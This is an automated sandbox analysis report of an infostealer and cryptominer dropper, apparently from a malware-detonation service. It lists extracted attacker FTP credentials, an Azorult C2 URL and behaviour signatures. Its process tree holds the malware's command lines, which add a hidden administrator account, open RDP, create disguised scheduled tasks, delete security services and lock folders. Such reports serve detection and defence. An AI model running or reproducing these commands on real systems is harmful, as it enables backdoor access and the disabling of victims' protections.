Resubmissions

18/11/2020, 14:18 UTC

201118-dj27sn3f52 10

18/11/2020, 13:42 UTC

201118-1arz86e7w6 10

18/11/2020, 13:38 UTC

201118-n8jh228ctn 10

Analysis

  • max time kernel
    61s
  • max time network
    71s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18/11/2020, 13:38 UTC

General

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    45.141.184.35
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.91
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • XMRig Miner Payload 2 IoCs
  • ASPack v2.12-2.42 5 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 23 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 8 IoCs
  • Drops file in System32 directory 5 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 3 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\update.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\update.bin.exe"
    1⤵
    • Drops file in Drivers directory
    • Modifies WinLogon
    • Drops file in Program Files directory
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4012
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3664
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • Runs .reg file with regedit
            PID:3888
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:3168
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:3464
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3312
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:2028
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1856
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:2312
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:1328
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
              PID:2488
            • C:\Windows\SysWOW64\sc.exe
              sc config RManService obj= LocalSystem type= interact type= own
              5⤵
                PID:3124
              • C:\Windows\SysWOW64\sc.exe
                sc config RManService DisplayName= "Microsoft Framework"
                5⤵
                  PID:2772
            • C:\ProgramData\Windows\winit.exe
              "C:\ProgramData\Windows\winit.exe"
              3⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:3636
              • C:\Program Files (x86)\Windows Mail\WinMail.exe
                "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
                4⤵
                • Suspicious use of SetWindowsHookEx
                PID:2240
                • C:\Program Files\Windows Mail\WinMail.exe
                  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                  5⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:4104
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                4⤵
                  PID:4320
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 5
                    5⤵
                    • Delays execution with timeout.exe
                    PID:4400
            • C:\programdata\install\cheat.exe
              C:\programdata\install\cheat.exe -pnaxui
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3948
              • C:\ProgramData\Microsoft\Intel\taskhost.exe
                "C:\ProgramData\Microsoft\Intel\taskhost.exe"
                3⤵
                • Executes dropped EXE
                • NTFS ADS
                • Suspicious use of SetWindowsHookEx
                PID:2916
                • C:\Programdata\RealtekHD\taskhostw.exe
                  C:\Programdata\RealtekHD\taskhostw.exe
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of SetWindowsHookEx
                  PID:4208
                • C:\ProgramData\Microsoft\Intel\R8.exe
                  C:\ProgramData\Microsoft\Intel\R8.exe
                  4⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:4900
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
                    5⤵
                      PID:5016
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
                        6⤵
                        • Modifies registry class
                        PID:4116
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im Rar.exe
                          7⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4324
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im Rar.exe
                          7⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4332
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 3
                          7⤵
                          • Delays execution with timeout.exe
                          PID:4228
                        • C:\Windows\SysWOW64\chcp.com
                          chcp 1251
                          7⤵
                            PID:4832
                          • C:\rdp\Rar.exe
                            "Rar.exe" e -p555 db.rar
                            7⤵
                            • Executes dropped EXE
                            PID:4936
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im Rar.exe
                            7⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5000
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout 2
                            7⤵
                            • Delays execution with timeout.exe
                            PID:2816
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                            7⤵
                              PID:4120
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                                8⤵
                                  PID:4140
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                                    9⤵
                                      PID:4388
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                                      9⤵
                                        PID:4456
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                        9⤵
                                          PID:188
                                        • C:\Windows\SysWOW64\net.exe
                                          net.exe user "john" "12345" /add
                                          9⤵
                                            PID:4476
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 user "john" "12345" /add
                                              10⤵
                                                PID:4300
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              9⤵
                                                PID:4584
                                              • C:\Windows\SysWOW64\net.exe
                                                net localgroup "Администраторы" "John" /add
                                                9⤵
                                                  PID:4532
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                                    10⤵
                                                      PID:4612
                                                  • C:\Windows\SysWOW64\net.exe
                                                    net localgroup "Administratorzy" "John" /add
                                                    9⤵
                                                      PID:4676
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                                        10⤵
                                                          PID:2820
                                                      • C:\Windows\SysWOW64\net.exe
                                                        net localgroup "Administrators" John /add
                                                        9⤵
                                                          PID:4844
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                            10⤵
                                                              PID:5116
                                                          • C:\Windows\SysWOW64\net.exe
                                                            net localgroup "Administradores" John /add
                                                            9⤵
                                                              PID:4020
                                                              • C:\Windows\SysWOW64\net1.exe
                                                                C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                                10⤵
                                                                  PID:5092
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                9⤵
                                                                  PID:5104
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                    10⤵
                                                                      PID:4412
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net localgroup "Пользователи удаленного управления" John /add
                                                                    9⤵
                                                                      PID:3652
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                                        10⤵
                                                                          PID:4972
                                                                      • C:\Windows\SysWOW64\net.exe
                                                                        net localgroup "Remote Desktop Users" John /add
                                                                        9⤵
                                                                          PID:4288
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                            10⤵
                                                                              PID:4480
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net localgroup "Usuarios de escritorio remoto" John /add
                                                                            9⤵
                                                                              PID:1940
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                                10⤵
                                                                                  PID:4384
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                9⤵
                                                                                  PID:4316
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                    10⤵
                                                                                      PID:4744
                                                                                  • C:\rdp\RDPWInst.exe
                                                                                    "RDPWInst.exe" -i -o
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies WinLogon
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1636
                                                                                    • C:\Windows\SYSTEM32\netsh.exe
                                                                                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                      10⤵
                                                                                        PID:5112
                                                                                    • C:\rdp\RDPWInst.exe
                                                                                      "RDPWInst.exe" -w
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5028
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                                      9⤵
                                                                                        PID:4200
                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                        net accounts /maxpwage:unlimited
                                                                                        9⤵
                                                                                          PID:2192
                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                            C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                            10⤵
                                                                                              PID:4220
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                            9⤵
                                                                                            • Drops file in Program Files directory
                                                                                            • Views/modifies file attributes
                                                                                            PID:5052
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                            9⤵
                                                                                            • Drops file in Program Files directory
                                                                                            • Views/modifies file attributes
                                                                                            PID:4672
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\rdp"
                                                                                            9⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:1508
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout 2
                                                                                        7⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4880
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
                                                                                  4⤵
                                                                                  • Drops file in Drivers directory
                                                                                  PID:4436
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4664
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4960
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:5036
                                                                                • C:\ProgramData\WindowsTask\update.exe
                                                                                  C:\ProgramData\WindowsTask\update.exe
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4328
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:3136
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:2412
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:476
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
                                                                              2⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:2936
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                              2⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1528
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc start appidsvc
                                                                                3⤵
                                                                                  PID:3996
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                2⤵
                                                                                  PID:4072
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc start appmgmt
                                                                                    3⤵
                                                                                      PID:3976
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                    2⤵
                                                                                      PID:2452
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc config appidsvc start= auto
                                                                                        3⤵
                                                                                          PID:688
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                        2⤵
                                                                                          PID:3112
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc config appmgmt start= auto
                                                                                            3⤵
                                                                                              PID:4080
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                            2⤵
                                                                                              PID:2972
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc delete swprv
                                                                                                3⤵
                                                                                                  PID:1924
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                                2⤵
                                                                                                  PID:3700
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop mbamservice
                                                                                                    3⤵
                                                                                                      PID:2176
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                                    2⤵
                                                                                                      PID:2416
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc stop bytefenceservice
                                                                                                        3⤵
                                                                                                          PID:1404
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                                        2⤵
                                                                                                          PID:3644
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc delete bytefenceservice
                                                                                                            3⤵
                                                                                                              PID:3304
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                            2⤵
                                                                                                              PID:4088
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                sc delete mbamservice
                                                                                                                3⤵
                                                                                                                  PID:3960
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                                2⤵
                                                                                                                  PID:1524
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc delete crmsvc
                                                                                                                    3⤵
                                                                                                                      PID:2508
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                    2⤵
                                                                                                                      PID:2492
                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                        netsh advfirewall set allprofiles state on
                                                                                                                        3⤵
                                                                                                                          PID:2980
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                        2⤵
                                                                                                                          PID:3188
                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                            3⤵
                                                                                                                              PID:2700
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                            2⤵
                                                                                                                              PID:3040
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                3⤵
                                                                                                                                  PID:1240
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                2⤵
                                                                                                                                  PID:3820
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                    3⤵
                                                                                                                                      PID:68
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                    2⤵
                                                                                                                                      PID:2184
                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                        3⤵
                                                                                                                                          PID:2648
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                        2⤵
                                                                                                                                          PID:1776
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                            3⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:2236
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                          2⤵
                                                                                                                                            PID:1032
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:1272
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                            2⤵
                                                                                                                                              PID:3932
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:2120
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                              2⤵
                                                                                                                                                PID:3164
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:3460
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                                2⤵
                                                                                                                                                  PID:3012
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:3936
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2428
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:1304
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1748
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:1880
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1316
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:4036
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2640
                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                            icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies file permissions
                                                                                                                                                            PID:948
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3492
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                              3⤵
